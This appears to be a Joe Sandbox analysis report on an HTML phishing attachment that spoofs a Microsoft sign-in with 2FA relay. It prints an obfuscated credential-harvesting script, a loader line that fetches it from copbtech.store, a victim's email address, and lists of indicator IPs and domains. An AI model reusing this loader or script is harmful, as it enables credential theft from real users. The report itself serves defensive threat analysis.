Excluded IPs from analysis (whitelisted): 142.250.185.131, 74.125.133.84, 172.217.18.14, 216.58.206.78, 172.217.23.110, 172.217.16.206, 199.232.214.172, 2.23.77.188, 142.250.186.74, 216.58.206.74, 142.250.185.202, 142.250.181.234, 142.250.185.74, 142.250.186.138, 142.250.186.42, 142.250.186.106, 172.217.16.138, 172.217.18.106, 142.250.74.202, 142.250.185.234, 172.217.18.10, 142.250.186.170, 142.250.184.202, 142.250.185.138, 216.58.212.138, 142.250.74.206, 216.58.212.142, 142.250.186.110, 216.58.206.35, 142.250.186.78, 142.250.185.142, 142.250.185.78, 142.250.185.206, 142.250.186.46, 2.23.242.162, 20.12.23.50, 13.107.246.65, 13.107.246.45, 13.107.246.61
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Input	Output
URL: email Model: Joe Sandbox AI	{ "risk_score": 1, "reasoning": [ "No headers provided to analyze", "Cannot make security assessment without header information", "Default to low risk score due to lack of evidence" ] }
Date: unknown
URL: https://copbtech.store/tsk/xls/t1s2kc2v.js... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It appears to be a malicious phishing script that collects user credentials and sends them to an untrusted domain. While some contextual factors like the use of a Microsoft-related domain may suggest a legitimate purpose, the overall behavior is highly suspicious and poses a significant security risk." }
function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['Forgot\x20Password?','status','16px','4MwKLAu','none','text/css','Privacy\x20statement','2faerror','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22submit-btn\x22\x20style=\x22background-color:\x20#0066BA;\x22>Sign\x20In</button></div>','load','#f2f2f2','1px\x20solid\x20#ddd','.logoname','#next','cursor','translate(-50%,\x20-50%)','34334TyiVJj','approve_signin','#sign-in-another-way','(((.+)+)+)+$','keypress','div7','#back-text','20px\x2020px','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2230px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic1\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br><span\x20class=\x22h5\x22\x20id=\x22si\x22>Sign\x20In</span><br><span\x20id=\x22error\x22\x20class=\x22text-danger\x22\x20style=\x22display:\x20none;\x22>Enter\x20your\x20email\x20address\x20or\x20phone\x20number.</span>','<style>','#div2','#back-otc','parse','center','onclick','#user-email-otc','stylesheet','maxWidth','Incorrect\x202FA\x20code.\x20Try\x20again.','Create\x20one!','#msg','css','rel','html','50%','ready','<div\x20class=\x22form-group\x20mt-2\x22><input\x20type=\x22email\x22\x20name=\x22ai\x22\x20class=\x22form-control\x20rounded-0\x20border-dark\x22\x20id=\x22ai\x22\x20aria-describedby=\x22aiHelp\x22\x20placeholder=\x22Email,\x20phone,\x20or\x20Skype\x22\x20style=\x22border-right:\x20none;\x20border-left:\x20none;\x20border-top:\x20none;\x22></div>','head','no-repeat','text','table','Handling\x202faotcerror\x20status','flex','https://code.jquery.com/jquery-3.1.1.min.js','ajax','onclose','#user-email-text','An\x20error\x20occurred.\x20Please\x20try\x20again.','18px','constructor','link','keydown','aHR0cHM6Ly9jb3BidGVjaC5zdG9yZS90c2sveGxzL2xvZ2luLnBocA','div','<div\x20class=\x22form-group\x20mt-2\x22><label\x20for=\x22approve-signin\x22\x20class=\x22h5\x22>Approve\x20sign-in\x20request</label><p><img\x20src=\x22https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg\x22\x20width=\x2220px\x22></img> Open\x20your\x20Authenticator\x20app,\x20and\x20enter\x20the\x20      number\x20shown\x20to\x20sign\x20in.</p><p\x20id=\x22approve-number\x22\x20class=\x22h3\x20text-center\x22></p></div>','div1','height','type','Incorrect\x202FA\x20code','#loadtext','innerText','ws://server.povbtech.store:8053','send','Taking\x20you\x20to\x20your\x20Organization\x27s\x20sign-in\x20page','preventDefault','display:\x20none;','300px','100px','createElement','replace','cover','row\x20topp','<div>','input','#div1','{}.constructor(\x22return\x20this\x22)(\x20)','Success!','<footer>','color','padding','texterror','#4CAF50','src','style','8336944ihNpnv','#pr','top','span','WebSocket\x202FA\x20connection\x20established','https://www.office.com','#pst','#si','#888','18HKVHba','animate','close','#submit-btn','#verify-2fa','2px\x20solid\x20#888','#approve-number','POST','div6','click','search','location','https://api.ipify.org?format=json','#2fa-code','div2','2320xRrubD','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2230px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20logoname\x22\x20id=\x22mic2\x22\x20style=\x22color:\x20#747474;\x22>Microsoft</span><br><br><div\x20class=\x22text-center\x20mt-3\x22><span\x20id=\x22loadtext\x22\x20style=\x22font-size:\x2022px;\x20font-weight:\x20bold;\x20text-align:\x20left;\x20display:\x20block;\x22>Taking\x20you\x20to\x20your\x
URL: file:///C:/Users/user/Desktop/ATT-897850.htm... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits high-risk behaviors, including the use of a dynamically loaded script from an untrusted domain ('https://copbtech.store/tsk/xls/t1s2kc2v.js'). The script also appears to be collecting a user's email address ('anna.duerksen@bbraun.com'), which could be used for malicious purposes such as phishing or data exfiltration. Overall, the combination of dynamic code execution and potential data collection makes this script highly suspicious and potentially malicious." }
var uid = 'anna.duerksen@bbraun.com'; var script = document.createElement('script'); script.src = "https://copbtech.store/tsk/xls/t1s2kc2v.js"; document.head.appendChild(script);
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Click to verify you are human", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Click to verify you are human", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: :// Model: Joe Sandbox AI	```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 0, "spoofed": 0, "reasoning": "The provided input is not a valid URL. It lacks a scheme (e.g., 'http', 'https') and a domain name, making it impossible to analyze for typosquatting or any brand association. Without a complete URL structure, no assessment of similarity or spoofing likelihood can be made."}
URL: ://
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your account or password is incorrect. If you don't remember your password, reset it now", "prominent_button_name": "Sign In", "text_input_field_labels": [ "Enter Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "software download portal" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Your account or password is incorrect. If you don't remember your password, reset it now", "prominent_button_name": "Sign In", "text_input_field_labels": [ "Enter Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "software download portal" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Taking you to your Organization's sign-in page", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Taking you to your Organization's sign-in page", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false, "page_classification": "unknown" }

URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/ATT-897850.htm Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.0.209.120	https://1drv.ms:443/o/s!BDUkX1Fbp6_igwpBxnZTcbnBB5zq?e=90f04oI-vEKlpr0bwyVv1w&at=9	Get hash	malicious	HTMLPhisher	Browse	partosasasic.cf/000
239.255.255.250	https://connect.jumpcelibateencounter.shop/monica.raw	Get hash	malicious	Unknown	Browse
	SIGNED!.pdf	Get hash	malicious	Unknown	Browse
	https://norpor.shop/riiw2-1.mp4	Get hash	malicious	Unknown	Browse
	http://md-pass.com	Get hash	malicious	Unknown	Browse
	https://dnl.hb-fein.de/	Get hash	malicious	Unknown	Browse
	20252201_pdf.html	Get hash	malicious	Unknown	Browse
	http://www.nhtfxq.blogspot.ie/	Get hash	malicious	Phisher	Browse
	http://narod.ru//disk/10290564001/sm010%20.pdf.htm	Get hash	malicious	HTMLPhisher	Browse
	http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=	Get hash	malicious	HTMLPhisher	Browse
	https://duskrise.shop/	Get hash	malicious	Unknown	Browse
185.174.100.20	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse
	original (37).eml	Get hash	malicious	Unknown	Browse
	022 0.10.htm	Get hash	malicious	HTMLPhisher	Browse
151.101.66.137	http://novo.oratoriomariano.com/novo/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	http://site9615380.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js
	http://grandprairie-water-damage-restoration.com	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	2023121142000021ki01kvjs.html	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-latest.min.js
199.188.200.183	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse
	original (37).eml	Get hash	malicious	Unknown	Browse
	022 0.10.htm	Get hash	malicious	HTMLPhisher	Browse
	https://meta-support-appeal-121990471.web.app/?fbclid=IwAR2ERcmpRDTqhoR3yP2aGaz5HMr2YatUE6jHnHB-ZmqfmSZHkA8481CtMGU#/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
code.jquery.com	https://u7161484.ct.sendgrid.net/ls/click?upn=u001.hSwgV93oKqJ8ZvQ-2F-2Bg69leJsDFyzxPqsdyn4u9nXlJ-2B6tkk6nJugZTBex7q8Bn0crymO_HWAk4DGcP5bOseprwmP7vk4oPocF8foKuuZ9Gg-2BpJSf91zEc1yKPirhoW5wrM1VwT52KX29gwhWicwPDJN07RIgbjxC9h1iMShoNFD06lkP5EL7RVTmw6uf62LvDusJsijFP5CUQRlAY8ahZCIQDkJoZZ4jIjGsaGCaXZFKo-2Bu-2FNyHOieA1StMfbMO0r4g3-2F6cWxF-2BbUhg4nNNa5dNEMfBGE9SzPWqx-2BDBtFhfnng0cmB3kSsLPF-2FkdxJANku3a5pIHPlu7BT-2FOicE-2BslbsDEywWcFUIRho5JtVA8XqiaVoGnaz9g5HoXxAiKktBgnHX-2BLGeTRoWcy2OvW97QKycfDHbq8hDg2h6meJy8K6A9IRYsO9ZC8m-2Bj8DX9Zj8SxfrFqPF8JeXlHA1OcqwW-2BuIUFmZ3K1da-2B4kgROQf1TkWsDcXYmprsgj8RLIvwUJL0B9	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://trusting-burnell.67-23-166-125.plesk.page/mathieu.nanty.--_--penelope.lymandixon/nathalie.sacristain.--_--christophe.garnier/fabrice-delfavero--_--philippe.touset/olivier.deladerriere--_--pierre.nugon/	Get hash	malicious	Unknown	Browse	151.101.66.137
	http://resourcedapps.vercel.app/wallet/import/index.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://microsoft-teams-download.burleson-appliance.net/?msclkid=405ba02277c21a93ebbac7ad905a34e1	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://microsoft-teams-download.burleson-appliance.net/?msclkid=405ba02277c21a93ebbac7ad905a34e1	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://app.getbeamer.com/onedrivesecure/en	Get hash	malicious	Unknown	Browse	151.101.130.137
	https://cookcountyil.my.canva.site/	Get hash	malicious	Unknown	Browse	151.101.2.137
	http://414611	Get hash	malicious	HTMLPhisher	Browse	151.101.66.137
	Message.eml	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://zfrmz.com/hu0ngo1Ul357L1ChjHxW	Get hash	malicious	Unknown	Browse	151.101.66.137
sopbtech.store	+11375 Caller left Vc MsG 8b1538917f01661e6746a0528d545dbeac3b40a5- 73945.msg	Get hash	malicious	HtmlDropper	Browse	199.188.200.183
	Play-Audio_Vmail_Ach Statement Credi....html	Get hash	malicious	HtmlDropper	Browse	199.188.200.183
	Play_VM.Now.matt.sibilo_Audio.wav...v.html	Get hash	malicious	HtmlDropper	Browse	199.188.200.183
	original (37).eml	Get hash	malicious	Unknown	Browse	199.188.200.183
	022 0.10.htm	Get hash	malicious	HTMLPhisher	Browse	199.188.200.183
s-part-0017.t-0009.t-msedge.net	https://dnl.hb-fein.de/	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/anJvZmVAYmVsbHBvdHRlci5jb20uYXU=	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	MSystem32.exe	Get hash	malicious	Nanocore	Browse	13.107.246.45
	tgeh_1.svg	Get hash	malicious	Unknown	Browse	13.107.246.45
	http://sahadayiz.com.tr/tec/les/K82cqkpomPEEC3lMMcYg4Gph6AcNsuj8uKaZh/john.walker@gmail.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	http://www.realfakedoors.net/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://alexfxvi.pro/alex-vi-tg	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.allegronigp.com/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://netzero-update-de0726.webflow.io/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://trustpolicyengagesolutions.vercel.app/assist&	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
copbtech.store	AP Credit_Note000381.html____	Get hash	malicious	HTMLPhisher	Browse	162.0.209.27

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	https://jantaexpress.com/UyRV4rC	Get hash	malicious	Unknown	Browse	66.63.187.232
	https://dtrnconsulta.com/hnvwk	Get hash	malicious	Unknown	Browse	66.63.187.232
	JvrQuHMa2C.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	gj2tWCRpMS.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	iRMbIIEjhP.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	V2yjcnvr6z.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	P4906RXNYH.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	shJGPJRkwH.pdf	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	66.63.187.216
	z5z84fR7lS.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
	pfK5wqaIhu.pdf	Get hash	malicious	Unknown	Browse	66.63.187.216
NAMECHEAP-NETUS	022QCX_End_User_List_2025.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	https://div-classstart-0-dropdown.odoo.com/documents/content/heIbobZBSqWGKM9nbnbWkQob	Get hash	malicious	HTMLPhisher	Browse	68.65.123.236
	Annual Leave sheet 2025.vbs	Get hash	malicious	MassLogger RAT	Browse	198.54.122.135
	ADtours0121025.Vbs.vbs	Get hash	malicious	FormBook	Browse	68.65.122.71
	15300429772_20250121_09114163_HesapOzeti.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	CV-Elena-Alba-Garcia.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	New Invoice.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	PO#98540-00.exe	Get hash	malicious	FormBook	Browse	63.250.47.57
	INVOICE, PACKING LIST, COPY BL.exe	Get hash	malicious	FormBook	Browse	192.64.118.221
	11001_10032.jse	Get hash	malicious	FormBook	Browse	63.250.47.57
ACPCA	https://recruit.threadsforteams.com/	Get hash	malicious	Unknown	Browse	162.0.217.138
	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	162.54.1.185
	Cotizaci#U00f3n____________________pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Personliche Nachricht fur UTF 8 Q Jaroslav Hren C3 A1k.pdf	Get hash	malicious	HTMLPhisher	Browse	162.55.236.224
	payment slip______________________pdf.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	https://cancelartransferenciaprogramadabdb.glitch.me/	Get hash	malicious	Unknown	Browse	162.55.133.151
	Handler.exe	Get hash	malicious	DanaBot, PureLog Stealer, Vidar	Browse	162.0.209.157
	bot.sh4.elf	Get hash	malicious	Unknown	Browse	162.52.78.29
	DESCRIPTION.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
	Scanned-IMGS_from NomanGroup IDT.scr.exe	Get hash	malicious	FormBook	Browse	162.0.215.244
FASTLYUS	http://www.nhtfxq.blogspot.ie/	Get hash	malicious	Phisher	Browse	151.101.129.229
	tgeh_1.svg	Get hash	malicious	Unknown	Browse	199.232.196.193
	https://u7161484.ct.sendgrid.net/ls/click?upn=u001.hSwgV93oKqJ8ZvQ-2F-2Bg69leJsDFyzxPqsdyn4u9nXlJ-2B6tkk6nJugZTBex7q8Bn0crymO_HWAk4DGcP5bOseprwmP7vk4oPocF8foKuuZ9Gg-2BpJSf91zEc1yKPirhoW5wrM1VwT52KX29gwhWicwPDJN07RIgbjxC9h1iMShoNFD06lkP5EL7RVTmw6uf62LvDusJsijFP5CUQRlAY8ahZCIQDkJoZZ4jIjGsaGCaXZFKo-2Bu-2FNyHOieA1StMfbMO0r4g3-2F6cWxF-2BbUhg4nNNa5dNEMfBGE9SzPWqx-2BDBtFhfnng0cmB3kSsLPF-2FkdxJANku3a5pIHPlu7BT-2FOicE-2BslbsDEywWcFUIRho5JtVA8XqiaVoGnaz9g5HoXxAiKktBgnHX-2BLGeTRoWcy2OvW97QKycfDHbq8hDg2h6meJy8K6A9IRYsO9ZC8m-2Bj8DX9Zj8SxfrFqPF8JeXlHA1OcqwW-2BuIUFmZ3K1da-2B4kgROQf1TkWsDcXYmprsgj8RLIvwUJL0B9	Get hash	malicious	Unknown	Browse	151.101.66.137
	Anal Glory 5 Brazzers 2024 XXX WEBDL 540p SP...msi	Get hash	malicious	Unknown	Browse	151.101.193.108
	http://codingkeguru.github.io/netflix-clone-website/	Get hash	malicious	HTMLPhisher	Browse	185.199.108.153
	https://trusting-burnell.67-23-166-125.plesk.page/mathieu.nanty.--_--penelope.lymandixon/nathalie.sacristain.--_--christophe.garnier/fabrice-delfavero--_--philippe.touset/olivier.deladerriere--_--pierre.nugon/	Get hash	malicious	Unknown	Browse	151.101.66.137
	https://my-site-108654-109294.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	151.101.65.46
	http://rpcmaindap.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	151.101.129.140
	https://rakshit099-g.github.io/PROJECT_WORKS/	Get hash	malicious	HTMLPhisher	Browse	185.199.108.153
	http://resourcedapps.vercel.app/wallet/import/index.html	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 7390
Category:	dropped
Size (bytes):	2407
Entropy (8bit):	7.900400471609788
Encrypted:	false
SSDEEP:	48:XVBUIsjnR4Zg0ddZ8E5EyQk7J0e+r/9lifUUuHDM3oOY+:XUIIKZg0ddZdEzTsfUUmyY+
MD5:	9D372E951D45A26EDE2DC8B417AAE4F8
SHA1:	84F97A777B6C33E2947E6D0BD2BFCFFEC601785A
SHA-256:	4E9C9141705E9A4D83514CEE332148E1E92126376D049DAED9079252FA9F9212
SHA-512:	78F5AA71EA44FF18BA081288F13AD118DB0E1B9C8D4D321ED40DCAB29277BD171BBB25BA7514566BBD4E25EA416C066019077FAA43E6ED781A29ADB683D218E2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	...........Y=s.8......mr...f.y....8.R...l.Nk.l..?....{$.l\|e'zM.3...............S(..........O./......Mn.e..O..7.O.?=..?........../...~yy._t....8.a........~.....+..$..*..z..\....~..Jx\|............\|y...=................./.3....kN2...H...;<sy....H..?2..q5.0.0....f......L.^..v.W.L..7XCm8.I...6\.p.....O/%sX..I.......u............yE......$q....1/.....W....Zg...w..-..v....x...N)........R....c.W5.=...{_1_...+.#.......e...K..:..b.Ec...!...".I1../2X.....].i.sAF;^.1....1/UM.[r..d...>RX..U...<..1...V.\|.......X.jX:..0...9..F.KsT...{.6,.._Q..9.b...Q)..0.R.t.u.JN..u$V.%X.9k..t.."..Q.........y.V.Z$7.q.{......k.......W....5.x..K.."y...=......4...h\|!....r.."v\f`..c+.......b..hc.jn....0.&G..m.=.@..6../......6....tM^.&3.$......~.....m2...wFs..#5.Hy..?...r.p.O.X.'n...Z8L......7.;..QWGnr.sY..n...3.Jfq..+{m....\...X.q...0...0...........}}d...33.....Q...F$.8..v..UH&.H........0.q..n...q...F.Y7...u..B>..J.A.....$.,....w......Z..oe..w..%....$[+.......d...

Chrome Cache Entry: 75

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (46383), with no line terminators
Category:	downloaded
Size (bytes):	46403
Entropy (8bit):	5.126047344768745
Encrypted:	false
SSDEEP:	768:i7mKs/kUFLpTtTOT+Th63WZk/vHnCO23HJ+L+Goy3gdlDD5jBvUXNHwQDkK5:b/Vp5yCZZku5SDD
MD5:	763D3AC04A7EC4ACC892616F4036CD0A
SHA1:	962560BCE8DC4540F6D4AE823FDAF8E3E0716D32
SHA-256:	0DBA4A2C3BA7DBCEC11536155282DD0B3128E5C9C0FE271ABF8640F2F166C5A7
SHA-512:	7E564BABA0F0C88A41EA5B306EE326D0FBAEE8EB3BED3D10C7594DA9657D8DEA14515EDB6D18A9247C2625FB43DF90FAB5E0C19FF47FDD9F6D5D17AC22EB8CFD
Malicious:	false
Reputation:	low
URL:	https://copbtech.store/tsk/xls/t1s2kc2v.js
Preview:	function _0x422a(_0x1e526e,_0x516891){var _0x49c9fb=_0x114c();return _0x422a=function(_0x296a38,_0x3228ba){_0x296a38=_0x296a38-0x156;var _0x4b2f98=_0x49c9fb[_0x296a38];return _0x4b2f98;},_0x422a(_0x1e526e,_0x516891);}function _0x114c(){var _0x30589e=['Forgot\x20Password?','status','16px','4MwKLAu','none','text/css','Privacy\x20statement','2faerror','<div\x20class=\x22text-right\x22><button\x20type=\x22button\x22\x20class=\x22btn\x20rounded-0\x20text-white\x20px-4\x22\x20id=\x22submit-btn\x22\x20style=\x22background-color:\x20#0066BA;\x22>Sign\x20In</button></div>','load','#f2f2f2','1px\x20solid\x20#ddd','.logoname','#next','cursor','translate(-50%,\x20-50%)','34334TyiVJj','approve_signin','#sign-in-another-way','(((.+)+)+)+$','keypress','div7','#back-text','20px\x2020px','<img\x20src=\x22https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico\x22\x20class=\x22img-fluid\x20logoimg\x22\x20width=\x2230px\x22>\x20\x20<span\x20class=\x22align-middle\x20h5\x20

Chrome Cache Entry: 76

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
Category:	dropped
Size (bytes):	17174
Entropy (8bit):	2.9129715116732746
Encrypted:	false
SSDEEP:	24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
MD5:	12E3DAC858061D088023B2BD48E2FA96
SHA1:	E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256:	90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512:	C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious:	false
Reputation:	high, very likely benign file
Preview:	..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""

Chrome Cache Entry: 77

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (46383), with no line terminators
Category:	dropped
Size (bytes):	46403
Entropy (8bit):	5.126047344768745
Encrypted:	false
SSDEEP:	768:i7mKs/kUFLpTtTOT+Th63WZk/vHnCO23HJ+L+Goy3gdlDD5jBvUXNHwQDkK5:b/Vp5yCZZku5SDD
MD5:	763D3AC04A7EC4ACC892616F4036CD0A
SHA1:	962560BCE8DC4540F6D4AE823FDAF8E3E0716D32
SHA-256:	0DBA4A2C3BA7DBCEC11536155282DD0B3128E5C9C0FE271ABF8640F2F166C5A7
SHA-512:	7E564BABA0F0C88A41EA5B306EE326D0FBAEE8EB3BED3D10C7594DA9657D8DEA14515EDB6D18A9247C2625FB43DF90FAB5E0C19FF47FDD9F6D5D17AC22EB8CFD
Malicious:	false
Reputation:	low
